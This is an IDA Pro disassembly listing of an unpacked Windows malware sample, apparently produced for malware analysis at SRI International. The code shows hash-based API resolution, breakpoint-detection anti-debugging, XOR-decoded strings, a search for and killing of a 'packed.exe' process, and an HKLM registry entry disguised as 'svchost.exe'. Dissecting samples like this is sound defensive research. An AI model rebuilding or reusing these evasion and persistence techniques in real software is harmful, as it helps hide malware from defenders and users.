;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 54274A2A4EC9F0784F11A419B702092C
; File Name : u:\work\54274a2a4ec9f0784f11a419b702092c_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00002245 ( 8773.)
; Section size in file : 00002245 ( 8773.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; DATA XREF: sub_4010B0+5E�o
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
lea eax, off_405004
push dword ptr [eax]
push dword ptr [eax+4]
push dword ptr [eax+8]
mov eax, [ebp+arg_8]
pop dword ptr [eax+0B4h]
pop dword ptr [eax+0C4h]
pop dword ptr [eax+0B8h]
xor eax, eax
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40102D proc near ; CODE XREF: sub_401729+4C�p
; sub_4018A3+66�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
mov bh, 0CCh
push [ebp+arg_0]
pop edi
mov bl, 36h
mov ebx, esi
push 0
pop ebx
mov ch, 4
mov ecx, 0
mov dh, 92h
mov dl, 0C5h
mov dh, 10h
loc_40104E: ; CODE XREF: sub_40102D+36�j
xor cl, [edi]
xor bl, [edi]
jmp short loc_401057
; ---------------------------------------------------------------------------
loc_401054: ; CODE XREF: sub_40102D+2D�j
sub cl, 20h
loc_401057: ; CODE XREF: sub_40102D+25�j
cmp cl, 20h
jnb short loc_401054
rol ebx, cl
inc edi
mov dl, [edi]
or dl, dl
jnz short loc_40104E
xor ebx, 9000h
mov [ebp+var_4], ebx
popa
push [ebp+var_4]
pop eax
leave
retn 4
sub_40102D endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401078 proc near ; CODE XREF: sub_40117B+79�p
; sub_401311+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov bl, dh
mov dl, bl
shr ecx, 2
push 0
pop eax
mov dh, 0A1h
mov bh, 67h
rep stosd
push [ebp+arg_4]
pop ecx
mov dl, bl
mov esi, 0B9h
and ecx, 3
mov dh, bl
rep stosb
mov bh, ch
mov bl, bh
mov dh, bh
popa
leave
retn 8
sub_401078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B0 proc near ; CODE XREF: sub_4016EF+30�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
cmp ds:dword_405018, 0
jnz locret_401177
pusha
push [ebp+arg_0]
pop eax
mov ecx, edi
mov esi, 0FDh
mov bl, 3
mov ebx, ecx
mov esi, 37h
mov byte ptr [eax], 0
mov bh, 0D8h
mov dl, 56h
mov ch, 0C5h
mov edx, ebx
sub eax, 4
mov edi, 40h
mov ch, bh
mov esi, ebx
mov ch, ch
mov dh, 0D1h
mov ebx, [eax]
push ebx
pop [ebp+var_4]
mov dh, cl
mov ecx, esi
mov dl, dh
or ebx, ebx
jz short loc_40116F
mov edx, ecx
mov ch, 0DEh
mov ecx, 53h
mov dl, ch
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
mov ds:off_405004, offset loc_401165
mov ds:dword_40500C, ebp
mov ds:dword_405008, esp
mov esi, 0FEh
mov dl, dh
mov esi, edx
mov ecx, edx
mov ch, dh
push 0FFFFFFFFh
push [ebp+var_4]
call near ptr 403814h
mov dh, cl
mov dl, dl
mov edi, esi
mov ecx, 76h
mov cl, dh
push [ebp+var_4]
call near ptr 4037EAh
mov ecx, esi
loc_401165: ; DATA XREF: sub_4010B0+71�o
; .rdata:off_405004�o
pop large dword ptr fs:0
add esp, 4
loc_40116F: ; CODE XREF: sub_4010B0+51�j
mov edi, 55h
mov edx, edx
popa
locret_401177: ; CODE XREF: sub_4010B0+D�j
leave
retn 4
sub_4010B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40117B proc near ; CODE XREF: sub_4014BB+60�p
; DATA XREF: sub_4014BB+37�o
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
mov ecx, offset dword_405010
push 1
pop eax
lock xadd [ecx], eax
inc eax
mov dl, ch
cmp ds:dword_405018, 0
jnz short loc_4011DA
mov ebx, 5Eh
mov bl, 4Dh
mov ch, dh
mov bh, cl
lea esi, [ebp+var_108]
mov edx, 2Dh
mov ebx, 0B2h
mov edx, 49h
mov ecx, ebx
mov ebx, edi
mov edi, edi
add esi, 4
mov edi, 48h
mov edx, 7Fh
mov bl, 65h
mov ch, dl
mov edx, 0F7h
jmp short loc_4011EA
; ---------------------------------------------------------------------------
loc_4011DA: ; CODE XREF: sub_40117B+1F�j
mov bl, dh
mov cl, 0AFh
mov ecx, ebx
mov edx, ecx
mov bl, bh
lea esi, dword_405028
loc_4011EA: ; CODE XREF: sub_40117B+5D�j
mov bh, 50h
mov dh, ch
push 0C8h
push esi
call sub_401078
mov ch, 33h
mov bh, 0DBh
push [ebp+arg_0]
pop eax
mov dl, 0B2h
mov ebx, ecx
mov edi, edx
mov edx, 7Ah
mov ebx, edi
mov edi, [eax]
mov ch, cl
mov ecx, ebx
push 0
pop eax
mov ecx, ebx
mov al, [edi+1]
mov cl, 52h
mov dl, 63h
mov ecx, edx
mov ecx, ecx
mov [ebp+var_4], eax
mov ecx, ebx
mov edx, 0FEh
mov ah, [edi]
mov bh, bh
mov bl, 38h
mov cl, 11h
mov ebx, ebx
add edi, 2
mov edx, 0BFh
mov dh, dh
mov edx, 19h
mov edx, ebx
loc_401249: ; CODE XREF: sub_40117B+111�j
mov al, [edi]
mov edx, 5
mov dh, bh
xor al, ah
mov edx, ebx
mov edx, edx
mov ebx, 0B1h
mov [esi], al
mov edx, 44h
mov bh, 1Ch
xor al, ah
rol ah, 2
mov bl, bh
inc esi
inc edi
mov ebx, edx
mov bh, bl
mov edx, ebx
dec [ebp+var_4]
mov edx, 3Eh
mov dh, bl
mov edx, edx
mov ebx, edx
mov edx, 0DBh
cmp [ebp+var_4], 0
jnz short loc_401249
cmp ds:dword_405018, 0
jnz short loc_401300
mov bh, bh
mov edi, [ebp+arg_0]
lea eax, [ebp+var_108]
mov cl, 23h
mov dl, bl
mov ebx, 0A0h
mov esi, edx
add eax, 4
mov ch, bl
mov edx, esi
mov ch, ch
mov dh, 6Ch
mov esi, edx
mov esi, esi
push eax
pop dword ptr [edi]
mov esi, 55h
mov bl, dh
mov edi, 0A4h
mov ebx, ebx
loc_4012CD: ; CODE XREF: sub_40117B+17A�j
mov ebx, edx
mov ch, dl
mov ecx, edi
push 0Ah
call near ptr 403808h
mov al, [ebp+var_104]
mov edx, ebx
mov edi, esi
mov bh, 0AAh
mov dh, dh
mov cl, ch
or al, al
jz short loc_4012F7
cmp ds:dword_405014, 0
jbe short loc_4012CD
loc_4012F7: ; CODE XREF: sub_40117B+171�j
mov ebx, edi
mov edx, 0B6h
mov cl, 66h
loc_401300: ; CODE XREF: sub_40117B+11A�j
mov ecx, offset dword_405010
push 0FFFFFFFFh
pop eax
lock xadd [ecx], eax
dec eax
leave
retn 4
sub_40117B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401311 proc near ; CODE XREF: sub_4014BB+71�p
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
mov ecx, offset dword_405010
mov eax, 1
lock xadd [ecx], eax
inc eax
mov ebx, 0BEh
mov dh, 11h
mov edx, 0BAh
mov dl, 1Fh
mov cl, 65h
cmp ds:dword_405018, 0
jnz short loc_401362
mov ebx, 93h
lea esi, [ebp+var_108]
mov ch, 0EDh
mov edi, edi
mov edx, 0E8h
add esi, 4
mov dl, 0ABh
mov ecx, 0CDh
jmp short loc_401372
; ---------------------------------------------------------------------------
loc_401362: ; CODE XREF: sub_401311+2F�j
mov ecx, 0DAh
mov edx, 0DAh
lea esi, byte_405435
loc_401372: ; CODE XREF: sub_401311+4F�j
mov edi, 0F8h
mov dh, 1
mov ecx, 60h
mov dl, bl
mov edi, 7
mov dl, cl
push 0C8h
push esi
call sub_401078
mov bh, bl
mov ebx, ebx
mov ebx, edx
mov dh, dh
mov eax, [ebp+arg_0]
mov bl, 0EDh
mov ecx, edx
push dword ptr [eax]
pop edi
mov bl, 94h
mov dh, dl
push 0
pop eax
mov bh, cl
mov dl, ch
mov al, [edi+1]
mov bl, 20h
push eax
pop [ebp+var_4]
mov ecx, edx
mov ecx, edx
mov bh, 0D9h
mov edx, ebx
mov bl, 23h
mov ebx, edx
mov ah, [edi]
mov cl, 0A8h
mov ecx, 6Ah
mov ecx, edx
mov ebx, ecx
mov dh, cl
add edi, 2
mov dh, dl
loc_4013D8: ; CODE XREF: sub_401311+122�j
mov al, [edi]
mov dl, bh
mov ebx, 0EAh
mov ebx, edx
mov ebx, 6Ch
xor al, ah
mov dh, dl
mov [esi], al
mov edx, ebx
mov bh, 0FEh
mov edx, ebx
mov dh, bl
xor al, ah
mov dh, 69h
mov edx, 0BFh
mov ebx, ebx
rol ah, 2
mov ebx, ebx
mov edx, edx
mov ebx, ebx
mov bh, 42h
mov bh, 4Fh
inc esi
mov dl, bl
mov dl, dl
mov bh, 26h
mov ebx, 0C9h
inc edi
mov bh, dl
mov dl, bh
mov dl, 0A7h
mov edx, ebx
mov edx, 0D8h
mov bh, 4Dh
dec [ebp+var_4]
mov edx, edx
cmp [ebp+var_4], 0
jnz short loc_4013D8
mov dl, 2Fh
mov dl, bl
cmp ds:dword_405018, 0
jnz short loc_4014A9
mov bl, dl
mov edx, esi
mov edi, [ebp+arg_0]
mov esi, ecx
mov edx, ecx
mov ch, 9Ch
mov edx, 4Fh
lea eax, [ebp+var_108]
mov ecx, 0C6h
mov edx, 0A6h
mov esi, esi
add eax, 4
mov dh, dh
mov [edi], eax
mov cl, bl
mov bl, dh
mov ebx, ecx
mov edx, edx
mov ecx, 20h
loc_40147A: ; CODE XREF: sub_401311+18F�j
mov ebx, 91h
mov dl, cl
mov ecx, ebx
push 0Ah
call near ptr 403808h
mov al, [ebp+var_104]
mov ecx, 4
or al, al
jz short loc_4014A2
cmp ds:dword_405014, 0
jbe short loc_40147A
loc_4014A2: ; CODE XREF: sub_401311+186�j
mov cl, 99h
mov edx, 68h
loc_4014A9: ; CODE XREF: sub_401311+12F�j
push offset dword_405010
pop ecx
push 0FFFFFFFFh
pop eax
lock xadd [ecx], eax
dec eax
leave
retn 4
sub_401311 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014BB proc near ; CODE XREF: sub_4016EF+E�p
; .text:00402E3B�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
pusha
mov ds:dword_405014, 0
push [ebp+arg_0]
pop eax
push eax
pop [ebp+var_4]
push 0
pop [ebp+var_8]
lea eax, [ebp+var_8]
push eax
pop [ebp+var_C]
lea eax, [ebp+var_4]
cmp ds:dword_405018, 0
jnz short loc_401514
push [ebp+var_C]
push 0
push eax
push offset sub_40117B
push 0
push 0
call near ptr 4037F0h
mov [ebp+var_8], eax
loc_401503: ; CODE XREF: sub_4014BB+55�j
push 0
call near ptr 403808h
mov eax, [ebp+arg_0]
cmp [ebp+var_4], eax
jz short loc_401503
jmp short loc_40153B
; ---------------------------------------------------------------------------
loc_401514: ; CODE XREF: sub_4014BB+2F�j
cmp [ebp+arg_4], 0
jnz short loc_40152B
push eax
call sub_40117B
lea eax, dword_405028
mov [ebp+var_4], eax
jmp short loc_40153B
; ---------------------------------------------------------------------------
loc_40152B: ; CODE XREF: sub_4014BB+5D�j
push eax
call sub_401311
lea eax, byte_405435
push eax
pop [ebp+var_4]
loc_40153B: ; CODE XREF: sub_4014BB+57�j
; sub_4014BB+6E�j
mov eax, [ebp+var_4]
sub eax, 4
mov ebx, [ebp+var_8]
mov [eax], ebx
popa
mov eax, [ebp+var_4]
leave
retn 8
sub_4014BB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
push dword ptr [ebp+8]
call near ptr 4037FCh
popa
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40155F proc near ; CODE XREF: sub_4015FD+22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push edx
push offset word_40583A
push 40h
push [ebp+arg_4]
push [ebp+arg_0]
call near ptr 40380Eh
mov eax, [ebp+arg_0]
push 0
pop ecx
nop
push [ebp+arg_8]
pop ebx
loc_401583: ; CODE XREF: sub_40155F+48�j
mov dh, [eax]
inc eax
nop
push eax
push 0
pop eax
pop eax
mov dl, [eax]
push edx
mov edx, 0
pop edx
xor dh, dl
mov [ebx], dh
inc ebx
nop
push ebx
mov ebx, 0
pop ebx
inc eax
inc ecx
cmp ecx, [ebp+arg_4]
jb short loc_401583
pop edx
pop ecx
pop ebx
pop eax
leave
retn 0Ch
sub_40155F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015B1 proc near ; CODE XREF: sub_4015E1+12�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
pusha
push offset word_40583A
push 40h
push [ebp+arg_4]
push [ebp+arg_0]
call near ptr 40380Eh
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
mov al, [ebp+arg_8]
loc_4015D0: ; CODE XREF: sub_4015B1+29�j
mov ah, [ecx]
xor ah, al
mov [ecx], ah
inc ecx
dec edx
or edx, edx
jnz short loc_4015D0
popa
leave
retn 0Ch
sub_4015B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015E1 proc near ; CODE XREF: .text:00401BBF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edx, [ebp+arg_0]
mov al, [edx]
mov ecx, [ebp+arg_0]
inc ecx
push eax
push [ebp+arg_4]
push ecx
call sub_4015B1
popa
leave
retn 8
sub_4015E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015FD proc near ; CODE XREF: sub_401629+21�p
; sub_401CBF+34�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
push [ebp+arg_8]
push [ebp+arg_4]
call sub_401078
mov eax, [ebp+arg_0]
inc eax
mov ecx, 0
mov cx, [eax]
inc eax
inc eax
push [ebp+arg_4]
push ecx
push eax
call sub_40155F
popa
leave
retn 0Ch
sub_4015FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_401629 proc near ; DATA XREF: sub_40166A+14�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push edx
push 0Ah
call near ptr 403808h
mov eax, [ebp+arg_0]
xor eax, 101h
push 400h
push offset aSvchost_exe ; "svchost.exe "
push eax
call sub_4015FD
loc_40164F: ; CODE XREF: sub_401629+37�j
push 3E8h
call near ptr 403808h
push 0
call near ptr 4037F6h
jmp short loc_40164F
sub_401629 endp
; ---------------------------------------------------------------------------
pop edx
pop ecx
pop ebx
pop eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40166A proc near ; CODE XREF: .text:00401B46�p
; .text:00401B72�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov eax, [ebp+arg_0]
xor eax, 101h
push offset word_40583E
push 0
push eax
push offset sub_401629
push 0
push 0
call near ptr 4037F0h
push 32h
call near ptr 403808h
popa
leave
retn 4
sub_40166A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push ecx
xor ecx, ecx
mov eax, [ebp+8]
mov dl, [ebp+10h]
loc_4016A5: ; CODE XREF: .text:004016B8�j
mov bh, [eax]
xor bh, cl
rol bh, 4
rol dl, 3
xor bh, dl
mov [eax], bh
inc eax
inc ecx
cmp ecx, [ebp+0Ch]
jb short loc_4016A5
pop ecx
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
mov ecx, 0
mov eax, [ebp+8]
add eax, [ebp+14h]
push 0
pop edx
mov dl, [ebp+10h]
loc_4016D5: ; CODE XREF: .text:004016E8�j
mov bh, [eax]
rol dl, 3
xor bh, dl
ror bh, 4
xor bh, cl
mov [eax], bh
inc eax
inc ecx
cmp ecx, [ebp+0Ch]
jb short loc_4016D5
popa
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4016EF proc near ; CODE XREF: sub_4017C8+24�p
; sub_4017C8+4E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push [ebp+arg_0]
pop eax
inc eax
push 1
push eax
call sub_4014BB
mov [ebp+var_4], eax
push eax
call near ptr 403802h
push eax
pop [ebp+var_8]
push [ebp+arg_4]
push [ebp+var_8]
call sub_401729
push eax
mov eax, [ebp+var_4]
push eax
call sub_4010B0
pop eax
leave
retn 8
sub_4016EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401729 proc near ; CODE XREF: sub_4016EF+26�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
pusha
mov ebx, [ebp+arg_0]
push 0
pop [ebp+var_14]
push dword ptr [ebx+3Ch]
pop eax
cmp word ptr [eax+ebx], 4550h
jnz short loc_4017BD
push dword ptr [eax+ebx+78h]
pop ecx
or ecx, ecx
jz short loc_4017BD
add ecx, ebx
push dword ptr [ecx+18h]
pop edx
mov eax, [ecx+1Ch]
mov esi, [ecx+20h]
mov edi, [ecx+24h]
add eax, ebx
mov [ebp+var_8], edx
add edi, ebx
mov [ebp+var_10], eax
push edi
pop [ebp+var_C]
add esi, ebx
push edx
pop [ebp+var_4]
loc_401770: ; CODE XREF: sub_401729+5E�j
mov ecx, [esi]
add ecx, ebx
push ecx
call sub_40102D
mov edx, eax
cmp edx, [ebp+arg_4]
jz short loc_40178B
add esi, 4
dec [ebp+var_4]
jnz short loc_401770
jmp short loc_4017BD
; ---------------------------------------------------------------------------
loc_40178B: ; CODE XREF: sub_401729+56�j
mov eax, [ebp+var_8]
push [ebp+var_C]
pop edx
sub eax, [ebp+var_4]
mov edx, [edx+eax*2]
mov eax, [ebp+var_10]
and edx, 0FFFFh
mov edx, [eax+edx*4]
add edx, ebx
push 0
pop eax
mov al, [edx]
xor eax, 9000h
cmp eax, 90CCh
jnz short loc_4017B9
xor edx, eax
loc_4017B9: ; CODE XREF: sub_401729+8C�j
push edx
pop [ebp+var_14]
loc_4017BD: ; CODE XREF: sub_401729+19�j
; sub_401729+22�j ...
popa
mov eax, [ebp+var_14]
leave
retn 8
sub_401729 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017C8 proc near ; CODE XREF: sub_4026B0+FC�p
; sub_4026B0+15B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
jmp short loc_4017D8
; ---------------------------------------------------------------------------
byte_4017CD db 0, 4Eh, 8 ; DATA XREF: sub_4017C8+1F�o
; sub_4017C8+49�o ...
dd 0FD965C25h, 0A1D7552Bh
; ---------------------------------------------------------------------------
loc_4017D8: ; CODE XREF: sub_4017C8+3�j
jmp short loc_4017DE
; ---------------------------------------------------------------------------
dword_4017DA dd 0D0D422FEh ; sub_4017C8+43�r ...
; ---------------------------------------------------------------------------
loc_4017DE: ; CODE XREF: sub_4017C8:loc_4017D8�j
push [ebp+arg_4]
push ds:dword_4017DA
push offset byte_4017CD
call sub_4016EF
call eax
push eax
pop dword_41E858
mov dword_41E85C, eax
cmp eax, 0
jz loc_40188C
push [ebp+arg_0]
push ds:dword_4017DA
push offset byte_4017CD
call sub_4016EF
call eax
mov dword_41E860, eax
inc dword_41E860
cmp eax, 0
jz short loc_40188C
loc_40182D: ; CODE XREF: sub_4017C8+C2�j
jmp short loc_401833
; ---------------------------------------------------------------------------
dword_40182F dd 0D4BCE432h ; sub_4026B0+173�r
; ---------------------------------------------------------------------------
loc_401833: ; CODE XREF: sub_4017C8:loc_40182D�j
push dword_41E860
push [ebp+arg_4]
push offset dword_41E864
push ds:dword_40182F
push offset byte_4017CD
call sub_4016EF
call eax
jmp short loc_401859
; ---------------------------------------------------------------------------
dword_401855 dd 0DF5C91CEh ; sub_401CBF+C3�r
; ---------------------------------------------------------------------------
loc_401859: ; CODE XREF: sub_4017C8+8B�j
push offset dword_41E864
push [ebp+arg_0]
push ds:dword_401855
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 0
jz short loc_401893
cmp dword_41E85C, 0
jz short loc_40188C
dec dword_41E85C
inc [ebp+arg_4]
jmp short loc_40182D
; ---------------------------------------------------------------------------
loc_40188C: ; CODE XREF: sub_4017C8+3A�j
; sub_4017C8+63�j ...
mov eax, 0
jmp short locret_40189F
; ---------------------------------------------------------------------------
loc_401893: ; CODE XREF: sub_4017C8+AE�j
mov eax, dword_41E858
sub eax, dword_41E85C
inc eax
locret_40189F: ; CODE XREF: sub_4017C8+C9�j
leave
retn 8
sub_4017C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018A3 proc near ; CODE XREF: .text:00401B2C�p
; .text:00402A40�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
jmp short loc_4018AC
; ---------------------------------------------------------------------------
dword_4018A8 dd 0E66E3AD5h ; ---------------------------------------------------------------------------
loc_4018AC: ; CODE XREF: sub_4018A3+3�j
push 0
push 2
push ds:dword_4018A8
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 0FFFFFFFFh
jz locret_40197E
push eax
pop dword_41E969
mov dword_41E96D, 128h
jmp short loc_4018E2
; ---------------------------------------------------------------------------
dword_4018DE dd 8B2869EFh ; ---------------------------------------------------------------------------
loc_4018E2: ; CODE XREF: sub_4018A3+39�j
push offset dword_41E96D
push dword_41E969
push ds:dword_4018DE
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 1
jnz short locret_40197E
loc_401904: ; CODE XREF: sub_4018A3+BC�j
push offset aPacked_exe ; "packed.exe"
call sub_40102D
cmp eax, [ebp+arg_0]
jnz short loc_40193A
jmp short loc_401919
; ---------------------------------------------------------------------------
dword_401915 dd 0E3EC403Ch ; sub_4018A3+C4�r ...
; ---------------------------------------------------------------------------
loc_401919: ; CODE XREF: sub_4018A3+70�j
push dword_41E969
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
push dword_41E975
pop eax
jmp short locret_40197E
; ---------------------------------------------------------------------------
loc_40193A: ; CODE XREF: sub_4018A3+6E�j
jmp short loc_401940
; ---------------------------------------------------------------------------
dword_40193C dd 34F9BA83h ; ---------------------------------------------------------------------------
loc_401940: ; CODE XREF: sub_4018A3:loc_40193A�j
push offset dword_41E96D
push dword_41E969
push ds:dword_40193C
push offset byte_4017CD
call sub_4016EF
call eax
or eax, eax
jnz short loc_401904
push dword_41E969
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
mov eax, 0
locret_40197E: ; CODE XREF: sub_4018A3+22�j
; sub_4018A3+5F�j ...
leave
retn 4
sub_4018A3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
push ecx
push eax
cld
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
push dword ptr [ebp+10h]
pop ecx
rep movsb
pop eax
pop ecx
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
word_40199E dw 4900h ; DATA XREF: .text:00401B6D�o
dd 71297A00h, 886C2A3Eh, 0D40A5DDCh, 38B4E695h, 39B1ED7Dh
dd 61BECD7Ch, 9C82F604h, 9D85CBC0h, 3AE084F2h, 0CA4F0C66h
dd 8D96E4BFh, 498FDFFh, 53D4A06Ah, 0A52C4905h, 88F586D7h
dd 4BB3DCE1h, 66FEA225h, 0D18CE32Bh, 6B4B3EB5h, 54ADC807h
dd 52B4E827h, 2E743913h, 17256B61h, 0FD72214Bh, 0F7A7D398h
dd 9CC4AD83h, 6C0A6DF2h, 281B471Fh, 34ABC46Bh, 0FBFB9D5Ah
dd 4AC3A492h, 0B3AB9B7Ah, 0EB451983h, 2B0E6BB8h, 9204705Fh
dd 80157BFBh, 4033E7h, 9EFB0003h, 6F0C0E76h, 30300230h
dd 74306C30h, 46305530h, 53305930h, 6C305530h, 51307830h
dd 54304230h, 59305430h, 5B304330h, 5F306630h, 45305C30h
dd 55305D30h, 6C300130h, 30303030h, 31303030h, 30300230h
dd 74306C30h, 46305530h, 53305930h, 6C305530h, 51307830h
dd 54304230h, 59305430h, 5B304330h, 5F306630h, 45305C30h
dd 55305D30h, 6C300230h, 30303030h, 31303030h, 30300230h
dd 74306C30h, 46305530h, 53305930h, 6C305530h, 51307830h
dd 54304230h, 59305430h, 5B304330h, 5F306630h, 45305C30h
dd 55305D30h, 6C300330h, 30303030h, 31303030h, 0CFCFCF30h
dd 5D0000CFh, 0EB979867h
db 4
dword_401AFD dd 4C218301h ; .text:00402364�r ...
; ---------------------------------------------------------------------------
push 28h
push ds:dword_401AFD
push offset byte_4017CD
call sub_4016EF
call eax
mov ecx, dword_41EAA1
mov dword_41EAA5, ecx
retn
; ---------------------------------------------------------------------------
push ds:dword_4019A0+157h
pop eax
xor al, 15h
push eax
call sub_4018A3
cmp eax, 0
jbe locret_401C82
push eax
pop dword_41EA9D
push 401A33h
call sub_40166A
jmp short loc_401B51
; ---------------------------------------------------------------------------
dword_401B4D dd 6D35E8E8h ; sub_4026B0+17�r ...
; ---------------------------------------------------------------------------
loc_401B51: ; CODE XREF: .text:00401B4B�j
push offset aSvchost_exe ; "svchost.exe "
push offset byte_41EAA9
push ds:dword_401B4D
push offset byte_4017CD
call sub_4016EF
call eax
push offset word_40199E
call sub_40166A
jmp short loc_401B84
; ---------------------------------------------------------------------------
byte_401B79 db 0, 44h, 8 ; DATA XREF: .text:00401B9F�o
; .text:00401BE9�o ...
dd 70327525h, 23777834h
; ---------------------------------------------------------------------------
loc_401B84: ; CODE XREF: .text:00401B77�j
jmp short loc_401B8A
; ---------------------------------------------------------------------------
dword_401B86 dd 0E5FBDE67h ; ---------------------------------------------------------------------------
loc_401B8A: ; CODE XREF: .text:loc_401B84�j
push offset dword_41EA95
push offset aSvchost_exe ; "svchost.exe "
push 80000002h
push ds:dword_401B86
push offset byte_401B79
call sub_4016EF
call eax
push 401A33h
call sub_40166A
push 0BAh
push 401A3Ch
call sub_4015E1
jmp short loc_401BCA
; ---------------------------------------------------------------------------
dword_401BC6 dd 0A79C0D67h ; .text:00401C1B�r ...
; ---------------------------------------------------------------------------
loc_401BCA: ; CODE XREF: .text:00401BC4�j
push 0B8h
push 401A3Ch
push 3
push 0
push offset aSvchost_exe ; "svchost.exe "
push dword_41EA95
push ds:dword_401BC6
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz locret_401C82
push 3
pop dword_41EA99
push 4
push offset dword_41EA99
push 4
push 0
push offset byte_41EAA9
push dword_41EA95
push ds:dword_401BC6
push offset byte_401B79
call sub_4016EF
call eax
push dword_41EA95
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
jmp short loc_401C4B
; ---------------------------------------------------------------------------
dword_401C47 dd 49E9E1A4h ; .text:00402B4D�r
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: .text:00401C45�j
push dword_41EA9D
push 0
push 1
push ds:dword_401C47
push offset byte_4017CD
call sub_4016EF
call eax
jmp short loc_401C6D
; ---------------------------------------------------------------------------
dword_401C69 dd 0A408C75Dh ; .text:00402B62�r
; ---------------------------------------------------------------------------
loc_401C6D: ; CODE XREF: .text:00401C67�j
push 1
push eax
push ds:dword_401C69
push offset byte_4017CD
call sub_4016EF
call eax
locret_401C82: ; CODE XREF: .text:00401B34�j
; .text:00401BF7�j
retn
; ---------------------------------------------------------------------------
byte_401C83 db 0 ; DATA XREF: sub_401CBF+2F�o
; .text:00401DDA�o
